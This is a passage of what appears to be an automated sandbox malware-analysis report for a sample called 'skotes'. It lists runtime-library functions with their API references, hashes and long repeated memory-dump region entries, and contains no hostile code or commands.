                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                              • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                              • API String ID: 348560076-465693683
                                                                                                                                              • Opcode ID: f58b92d4c4e00bcf5bf27aa27ff47abe9d9d96bf9284f4ef6c35bb9365769995
                                                                                                                                              • Instruction ID: 7446636b43ed96c2ff1984da05a0df0ba88540da13b2bfb01562f330eb4e0c65
                                                                                                                                              • Opcode Fuzzy Hash: f58b92d4c4e00bcf5bf27aa27ff47abe9d9d96bf9284f4ef6c35bb9365769995
                                                                                                                                              • Instruction Fuzzy Hash: DC01D6316813152DA710B7BA7C82FAB25DC9E05749B70043BFC04E3293EDACE808516D
                                                                                                                                              Function 00432097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • StructuredWorkStealingQueue.LIBCMT ref: 004320B7
                                                                                                                                                • Part of subcall function 0042CAF3: Mailbox.LIBCMT ref: 0042CB2D
                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004320C8
                                                                                                                                              • StructuredWorkStealingQueue.LIBCMT ref: 004320FE
                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043210F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                              • String ID: e
                                                                                                                                              • API String ID: 1411586358-4024072794
                                                                                                                                              • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                              • Instruction ID: 1ff5ec0336f97ae43b1f0b8f375a3bc5f2b05840f56227257267f5d03aa7fa4d
                                                                                                                                              • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                              • Instruction Fuzzy Hash: 9411C131200104ABDF45DE69CB8166B73A4AF0A328F14D05BFD068F242DBF9D905CB99
                                                                                                                                              Function 0041D029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • kernel32.dll, xrefs: 0041D04C
                                                                                                                                              • SleepConditionVariableCS, xrefs: 0041D05D
                                                                                                                                              • WakeAllConditionVariable, xrefs: 0041D069
                                                                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041D03B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___scrt_fastfail
                                                                                                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                              • API String ID: 2964418898-3242537097
                                                                                                                                              • Opcode ID: 1b85dab98efb64aa57ba8f372f57f10ac0056d4b018687693b19e405e9fa0288
                                                                                                                                              • Instruction ID: e5c7200f62861e871ccb6336968626887421c0a1374ee417b52edda75139816b
                                                                                                                                              • Opcode Fuzzy Hash: 1b85dab98efb64aa57ba8f372f57f10ac0056d4b018687693b19e405e9fa0288
                                                                                                                                              • Instruction Fuzzy Hash: B001F2B1EC2B2169FA303B766D01F9B158A8B46B4EF151023ED04E3290EEA8DC45916E
                                                                                                                                              Function 0042E8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 0042E91E
                                                                                                                                              • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E926
                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E950
                                                                                                                                              • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E959
                                                                                                                                              • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E9DC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 512098550-0
                                                                                                                                              • Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
                                                                                                                                              • Instruction ID: e456b2d5945dcb9d16af89579036fa7bc11e47face3e2a4e749ba7397f49833a
                                                                                                                                              • Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
                                                                                                                                              • Instruction Fuzzy Hash: A7418079B00219EFCB09DF65D454A6DB7B1FF48310F00816AE806A7391CB38AE41CF85
                                                                                                                                              Function 0041ECE6 Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0041ECED
                                                                                                                                              • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041ED17
                                                                                                                                                • Part of subcall function 0041F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F3FA
                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0041ED53
                                                                                                                                              • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0041ED94
                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EDC6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
